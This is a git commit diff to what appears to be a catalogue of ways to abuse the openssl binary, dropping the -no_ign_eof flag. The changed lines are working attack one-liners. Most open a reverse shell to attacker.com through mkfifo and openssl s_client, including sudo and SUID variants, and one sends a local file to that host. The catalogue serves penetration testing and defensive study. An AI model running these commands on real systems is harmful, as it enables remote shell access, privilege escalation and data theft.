Remove -no_ign_eof from openssl

As discussed in #121.
This commit is contained in:
Andrea Cardaci 2020-03-28 14:51:58 +01:00
parent ad919ba28b
commit 3310197fbc

View File

@ -11,7 +11,7 @@ functions:
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
file-upload: file-upload:
- description: | - description: |
To collect the file run the following on the attacker box: To collect the file run the following on the attacker box:
@ -24,7 +24,7 @@ functions:
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
LFILE=file_to_send LFILE=file_to_send
openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT < "$LFILE" openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE"
file-download: file-download:
- description: | - description: |
To send the file run the following on the attacker box: To send the file run the following on the attacker box:
@ -62,7 +62,7 @@ functions:
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
@ -78,5 +78,5 @@ functions:
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
--- ---